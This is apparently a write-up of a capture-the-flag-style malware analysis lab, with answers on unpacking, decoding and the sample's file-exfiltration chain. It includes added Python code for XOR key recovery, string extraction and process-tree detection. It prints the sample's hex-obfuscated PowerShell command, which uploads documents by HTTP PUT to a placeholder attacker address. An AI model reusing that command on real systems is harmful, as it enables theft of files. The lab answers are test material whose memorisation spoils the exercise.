Nullform Vault – OffSec Proving Grounds Practice Machine | AD Penetration Testing Lab

Explore Nullform Vault on OffSec Proving Grounds Practice: a static malware analysis lab covering UPX unpacking, string and import-table analysis, anti-debugging checks, C2 indicator extraction and a PowerShell-based exfiltration chain.


Jawstar

11/17/2025, 4 min read

About this lab

You and the OffSec Legends have waited – watchful, calculating. Ever since Voidweaver claimed the Echo Fragment, every line of code, every shift in energy has been scrutinized. You knew he would come for the Nullform Key next.
The Nullform Key holds dominion over entropy and rebirth and has long been hidden from sight, sealed in a vault so ancient it barely stirs even in myth. But its protection relied not just on locks, but obscurity – systems buried, threads severed, names forgotten.
Activity begins to stir.
A faint anomaly detected within a workstation tethered to the vault. An inconspicuous spike in process behavior. The alert was almost dismissed. Almost.
But this was no ordinary intrusion. This malware defied containment. It slipped past sandboxes, evading dynamic traps with precision. Only a deeper analysis will unravel its intent.
Traditional dynamic analysis techniques provide limited visibility. As such, static analysis of the binary is required to understand its capabilities, persistence methods, and potential impact.

Lab Instructions

Download the ZIP package; the archive password is "Obfuscated123!".
You are tasked with conducting a deep static analysis of the recovered malware sample. Your mission:
  • Identify the malware’s core functionality
  • Document its anti-debugging mechanisms
  • Extract its command-and-control (C2) infrastructure
  • Assess its persistence and spread potential
  1. What hardcoded IP address does the malware attempt to contact?

203.0.113.42

Discovery method:
  • Unpacked the UPX-compressed executable: upx -d Obfuscated_Intent.exe -o unpacked.exe
  • Located the PowerShell command in the unpacked binary (a UTF-16LE string; its hex-encoded byte list sits in the 0x4BE0-0x4CC0 region)
  • The IP address is not stored as text: it is a list of hex byte values inside that command
  • Decoded bytes: 0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,0x2E,0x34,0x32 = "203.0.113.42"
  • The same address is used for the ICMP connectivity check and for the HTTP exfiltration
Evidence location: offset 0x4C30-0x4C40 in the unpacked executable
Note: 203.0.113.0/24 is the TEST-NET-3 range that RFC 5737 reserves for documentation, so the lab sample cannot reach a live server at this address; treat it as a placeholder for a real C2 host.

  2. Which file extensions does the malware target for exfiltration?

.msg, .pdf, .doc, .docx, .xls

Discovery method:
  • Analyzed the unpacked binary for file-extension patterns; the extensions are not visible as plaintext
  • The extension list is XOR-encoded with the single-byte key 0x7a and decoded at runtime
  • The malware uses FindFirstFileW/FindNextFileW to scan the file system recursively, starting from C:\ (both imports confirmed by strings analysis)
  • The decoded list targets email messages (.msg) and document formats (.pdf, .doc, .docx, .xls)
Technical details:
  • Extension decoding: XOR with key 0x7a
  • Scan root: C:\
  • File discovery APIs: FindFirstFileW, FindNextFileW
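The walkthrough reports the key (0x7a) but not how to find it. The following added example, written for this page and not part of the author's analysis, recovers a single-byte XOR key from an encoded extension table by trying every key and scoring the output for ".ext" strings that end in a C string terminator. The encoded table is constructed here by XOR-ing the five extensions the analysis names with 0x7a; the bytes around it stand in for unrelated code and are not from the lab binary.

```python
"""Recover a single-byte XOR key that hides a file-extension list.

Added example for this walkthrough. The encoded table below is constructed
here by XOR-ing the extensions the analysis reports with 0x7a; the bytes on
either side stand in for unrelated code and are not taken from the lab binary.
"""
import re

EXT_RE = re.compile(rb"\.[a-z0-9]{2,4}(?=\x00)")   # ".ext" followed by a C string terminator


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same single-byte key."""
    return bytes(b ^ key for b in data)


def _build_sample() -> bytes:
    plain = [".msg", ".pdf", ".doc", ".docx", ".xls"]
    table = b"".join(e.encode() + b"\x00" for e in plain)   # NUL-terminated, back to back
    return b"\x55\x8b\xec\x83\xec\x40" + xor_bytes(table, 0x7A) + b"\xc9\xc3\xcc\xcc"


SAMPLE = _build_sample()   # constructed stand-in for a slice of the unpacked binary


def extensions_under_key(data: bytes, key: int):
    """Decode data with key and return every extension-like string found."""
    return [m.group().decode() for m in EXT_RE.finditer(xor_bytes(data, key))]


def recover_xor_key(data: bytes):
    """Try all 255 non-zero keys and keep the one exposing the most extensions.

    Key 0x00 is skipped because it is the identity transform. On a real binary
    run this over the .rdata/.data section rather than the whole file to keep
    false positives down.
    """
    best_key, best_hits = None, []
    for key in range(1, 256):
        hits = extensions_under_key(data, key)
        if len(hits) > len(best_hits):
            best_key, best_hits = key, hits
    return best_key, best_hits


if __name__ == "__main__":
    key, exts = recover_xor_key(SAMPLE)
    print(f"key = {key:#04x}, extensions = {exts}")
```

Because XOR is its own inverse, the same xor_bytes routine both builds the sample and decodes it; the scoring regex is what turns a 255-way guess into a single answer.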
  3. What string is used as payload in the malware's first network communication attempt?

w00t

Discovery method:
  • Located the ASCII string "w00t" at offset 0x4B00 in the unpacked binary
  • It appears in the context of the ICMP functionality built on the IcmpSendEcho API
  • Hexdump: 77 30 30 74 = "w00t"
  • Sent as the ICMP echo request payload to verify connectivity to the C2 server
Evidence:
  00004b00  77 30 30 74 00 00 00 00 5c 00 2a 00 00 00 00 00  |w00t....\.*.....|
Purpose: initial connectivity check before any file exfiltration is attempted.
Note the UTF-16LE L"\*" (5c 00 2a 00) immediately after the payload: a wildcard of this shape is what a program appends to a directory path before calling FindFirstFileW, which fits the recursive scan described in question 2. A 4-byte echo payload is also a usable network indicator, since the Windows ping utility sends a 32-byte payload by default.

  4. What is the decoded upload URL prefix used in the PowerShell exfiltration command?

http://203.0.113.42:8000/

Discovery method:
  • Located the PowerShell command construction in the binary (stored UTF-16LE)
  • Found the hex-encoded URL bytes in the command at offset 0x4BE0-0x4CC0:
    0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,
    0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,0x2E,0x34,0x32,
    0x3A,0x38,0x30,0x30,0x30,0x2F
  • Decoded with Python: ''.join(chr(b) for b in hex_bytes)
  • Result: http://203.0.113.42:8000/
PowerShell command structure:
  $abc = [System.Text.Encoding]::UTF8.GetString([byte[]](0x68,0x74...)) + '/'; Invoke-RestMethod -Uri $abc -Method Put -InFile ''
The -InFile argument is empty in the static template; the path of each discovered file is filled in when the command is assembled at runtime (question 7).
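The decoding in questions 1 and 4 is a one-off by hand; the same idea generalizes to any [byte[]](0x..,0x..) literal the binary carries. The following added example, written for this page and not the author's script, extracts ASCII and UTF-16LE strings from a blob and decodes every PowerShell byte-array literal it finds. The sample buffer is constructed to mimic the layout the analysis describes (an ASCII "w00t" payload, a UTF-16LE L"\*" wildcard, then the UTF-16LE PowerShell command); its offsets are those of the sample, not the 0x4B00/0x4BE0 offsets of the lab binary.

```python
"""Recover hex-encoded PowerShell indicators from a binary's string table.

Added example for this walkthrough: the sample bytes below are constructed to
mimic the layout the analysis describes (an ASCII "w00t" ICMP payload, a
UTF-16LE L"\\*" wildcard, then a UTF-16LE PowerShell command whose URL is a
[byte[]](0x..,0x..) literal). Offsets are those of this sample, not the lab binary.
"""
import re

_PS_COMMAND = (
    'powershell -Command "$abc = [System.Text.Encoding]::UTF8.GetString([byte[]]('
    "0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,"
    "0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,0x2E,0x34,0x32,"
    "0x3A,0x38,0x30,0x30,0x30,0x2F)) + '/'; "
    "Invoke-RestMethod -Uri $abc -Method Put -InFile ''\""
)

SAMPLE = (
    b"\x00" * 16                                     # padding
    + b"w00t\x00\x00\x00\x00"                        # offset 16: ASCII ICMP payload
    + "\\*".encode("utf-16-le") + b"\x00\x00"        # offset 24: L"\*" search wildcard
    + _PS_COMMAND.encode("utf-16-le") + b"\x00\x00"  # offset 30: UTF-16LE command
    + b"\x8b\x45\xfc\xc3\x90\x90" * 4                # trailing code bytes, no strings
)

BYTE_LITERAL_RE = re.compile(r"\[byte\[\]\]\(\s*((?:0x[0-9A-Fa-f]{1,2}\s*,?\s*)+)\)")
HEX_TOKEN_RE = re.compile(r"0x[0-9A-Fa-f]{1,2}")


def extract_strings(data: bytes, min_len: int = 4):
    """Yield (offset, encoding, text) for printable ASCII and UTF-16LE runs.

    Wide runs are only reported at even offsets: compilers 2-byte-align wchar_t
    strings, and the filter stops the tail of an ASCII run (one printable byte
    followed by NUL) from being misread as a one-character wide string.
    """
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_re.finditer(data):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in utf16_re.finditer(data):
        if m.start() % 2 == 0:
            yield m.start(), "utf-16-le", m.group().decode("utf-16-le")


def decode_byte_literals(text: str):
    """Decode every PowerShell [byte[]](0x68,0x74,...) literal in text to a string."""
    decoded = []
    for m in BYTE_LITERAL_RE.finditer(text):
        values = [int(tok, 16) for tok in HEX_TOKEN_RE.findall(m.group(1))]
        decoded.append(bytes(values).decode("utf-8", errors="replace"))
    return decoded


def recover_indicators(data: bytes):
    """Return (offset, decoded_string) for every hex byte literal in any string."""
    hits = []
    for offset, _encoding, text in extract_strings(data, min_len=2):
        for decoded in decode_byte_literals(text):
            hits.append((offset, decoded))
    return hits


if __name__ == "__main__":
    for offset, encoding, text in extract_strings(SAMPLE, min_len=2):
        print(f"{offset:#08x} {encoding:9s} {text[:60]}")
    for offset, decoded in recover_indicators(SAMPLE):
        print(f"decoded literal at {offset:#x}: {decoded}")
```

The min_len of 2 is used only so the short L"\*" wildcard shows up in the sample; on a real binary a threshold of 4 or more keeps the noise down, and the UTF-16LE pass is what plain strings(1) misses unless it is run with -e l.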

  5. Which function does the malware call to execute the assembled PowerShell command string? Provide the exact C runtime/WINAPI call used in the code.

wsystem (the C runtime export _wsystem)

Discovery method:
  • Searched the unpacked binary's strings for shell-execution functions
  • Found wsystem in the import/string table
  • Verified with: strings -a unpacked.exe | grep -i wsystem
  • Result: wsystem, the wide-character version of the C runtime system() function
Function purpose:
  • C runtime function for executing a shell command line; the w prefix marks the Unicode (wchar_t) variant, which matches the UTF-16LE command string in the binary
  • Executes the dynamically constructed PowerShell command
  • The binary does not call CreateProcess or ShellExecute itself; it relies on the CRT call
Caveat: _wsystem does not run the command on its own. The CRT passes the string to the command interpreter (cmd.exe /c ...), which in turn starts powershell.exe, so on the host the process tree is the malware executable, then cmd.exe, then powershell.exe. That intermediate cmd.exe is absent when a program calls CreateProcess directly and is a useful detection pivot.

  6. Which imported DLLs in the binary suggest it performs networking operations?

WS2_32.dll, IPHLPAPI.DLL

Discovery method:
  • Listed the PE import table with: objdump -p unpacked.exe | grep -i dll
  • Identified the networking-related DLLs:
    WS2_32.dll: Windows Sockets API (inet_addr and the socket functions)
    IPHLPAPI.DLL: IP Helper API (the ICMP functions)
Specific functions imported:
  • From IPHLPAPI.DLL: IcmpCreateFile (opens an ICMP handle), IcmpSendEcho (sends an ICMP echo request, i.e. a ping), IcmpCloseHandle (closes the handle)
  • From WS2_32.dll: network address conversion; inet_addr is the natural way to turn the decoded "203.0.113.42" string into the IPAddr value that IcmpSendEcho expects
Note that the HTTP upload is performed by the spawned PowerShell process (question 7), not by the binary's own socket code, so the Winsock import serves the ICMP check rather than the exfiltration traffic itself.

  7. How was the exfiltration functionality delivered and executed on the compromised system? Make sure to specify how the code that performs scanning and upload runs on the host, where the uploads are sent, the file types targeted, and the exact mechanism used to perform the upload.

The exfiltration functionality is embedded directly in the malware executable and runs natively on the compromised host; no additional payloads are downloaded.

Complete attack chain:

1. Anti-debugging and initialization
  • At startup the malware checks IsDebuggerPresent() (a debugger attached to the process) and CheckRemoteDebuggerPresent() (a debugger attached from another process)
  • If either check succeeds the malware terminates to evade analysis

2. Connectivity verification
  • Target: 203.0.113.42
  • Method: IcmpSendEcho() with the string "w00t" as the ICMP echo payload
  • Purpose: confirms a network path to the exfiltration server before any file is touched

3. Filesystem reconnaissance
  • Recursively scans the file system starting from C:\ using FindFirstFileW() and FindNextFileW()
  • Target extensions, XOR-decoded at runtime with key 0x7a:
    .pdf  PDF documents
    .doc  Word documents (legacy)
    .docx Word documents (modern)
    .xls  Excel spreadsheets
    .msg  Outlook email messages

4. PowerShell command construction
  • For each discovered target file the malware assembles a PowerShell command at runtime
  • Command template (stored UTF-16LE in the binary):
    powershell -Command "$abc = [System.Text.Encoding]::UTF8.GetString([byte[]](
      0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,
      0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,0x2E,0x34,0x32,
      0x3A,0x38,0x30,0x30,0x30,0x2F)) + '/'; Invoke-RestMethod -Uri $abc -Method Put -InFile ''"
  • The URL prefix decodes to http://203.0.113.42:8000/ only at runtime; the empty -InFile argument receives the path of the file being uploaded

5. Command execution and upload
  • Execution mechanism: the _wsystem() C runtime function, which launches the command line through cmd.exe
  • Upload method: PowerShell's Invoke-RestMethod cmdlet sending an HTTP PUT
  • Each file is uploaded individually to the attacker's server

Key technical details:
  • Delivery: native code execution (no downloaded payloads)
  • Persistence: single-run exfiltration (no persistence mechanism)
  • Obfuscation: UPX packing, XOR-encoded extension list, hex-encoded command strings
  • Evasion: anti-debugging checks plus runtime decoding of indicators
  • Upload destination: http://203.0.113.42:8000/
  • Targeted data: Office documents, PDFs and email messages
  • Upload mechanism: one HTTP PUT per file via PowerShell
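The chain above has a distinctive host-side shape: a non-interactive program, then cmd.exe (interposed by _wsystem), then powershell.exe whose command line rebuilds a URL from a hex byte array and uploads a file with Invoke-RestMethod -Method Put. The following added example, written for this page and not part of the walkthrough, reconstructs the process tree from process-creation events and flags that shape. The events are constructed, not real telemetry; their field names follow the ProcessId/ParentProcessId/Image/CommandLine layout of Sysmon Event ID 1, and the uploaded file path in the command line is invented for the sample.

```python
"""Detect the execution shape the analysis describes in process-creation telemetry.

Added example for this walkthrough. The events below are constructed, not
real logs; the field names follow the ProcessId/ParentProcessId/Image/
CommandLine shape of Sysmon Event ID 1, and the uploaded file path is invented.
"""
import re
from typing import Dict, List

_EXFIL_CMD = (
    'powershell -Command "$abc = [System.Text.Encoding]::UTF8.GetString([byte[]]('
    "0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,"
    "0x2E,0x34,0x32,0x3A,0x38,0x30,0x30,0x30,0x2F)) + '/'; "
    "Invoke-RestMethod -Uri $abc -Method Put -InFile 'C:\\Users\\alice\\Documents\\budget.xls'\""
)

EVENTS: List[Dict] = [
    {"ProcessId": 400, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    # the sample, started by the user from Explorer
    {"ProcessId": 4120, "ParentProcessId": 400,
     "Image": r"C:\Users\alice\Downloads\Obfuscated_Intent.exe",
     "CommandLine": "Obfuscated_Intent.exe"},
    # _wsystem() hands the assembled command line to cmd.exe /c ...
    {"ProcessId": 4132, "ParentProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c " + _EXFIL_CMD},
    {"ProcessId": 4140, "ParentProcessId": 4132,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": _EXFIL_CMD},
    # benign PowerShell for contrast: interactive parents, no encoded URL, no PUT upload
    {"ProcessId": 5000, "ParentProcessId": 400,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command Get-Date"},
    {"ProcessId": 5200, "ParentProcessId": 400, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    {"ProcessId": 5210, "ParentProcessId": 5200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -Command "Invoke-RestMethod -Uri https://updates.example.test/status"'},
]

RULES = {
    # a byte array of hex literals turned back into text: the walkthrough's URL trick
    "hex_bytearray_to_string": re.compile(r"GetString\(\s*\[byte\[\]\]\(\s*0x", re.I),
    # Invoke-RestMethod uploading a local file with PUT
    "invoke_restmethod_put_infile": re.compile(
        r"Invoke-RestMethod\b.*-Method\s+Put\b.*-InFile", re.I | re.S),
}
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def process_chain(events: List[Dict], pid: int) -> List[str]:
    """Image names from the oldest known ancestor down to pid."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:      # seen guards against PID-reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return list(reversed(chain))


def detect_exfil_powershell(events: List[Dict], min_reasons: int = 2) -> List[Dict]:
    """Flag powershell.exe events that match at least min_reasons indicators."""
    findings = []
    for e in events:
        if basename(e["Image"]) != "powershell.exe":
            continue
        reasons = [name for name, rx in RULES.items() if rx.search(e["CommandLine"])]
        chain = process_chain(events, e["ProcessId"])
        # system()/_wsystem() always interposes cmd.exe; cmd.exe launched by something
        # other than an interactive shell is the tell-tale shape of that call.
        if len(chain) >= 3 and chain[-2] == "cmd.exe" and chain[-3] not in INTERACTIVE_PARENTS:
            reasons.append("cmd_exe_spawned_by_non_interactive_parent")
        if len(reasons) >= min_reasons:
            findings.append({"ProcessId": e["ProcessId"], "chain": chain, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_exfil_powershell(EVENTS):
        print(f["ProcessId"], " -> ".join(f["chain"]), f["reasons"])
```

Requiring two independent indicators keeps an ordinary Invoke-RestMethod call or an interactive cmd.exe session from firing on its own; the ancestry rule is the one that survives if an attacker renames the cmdlet or moves the URL out of a byte array.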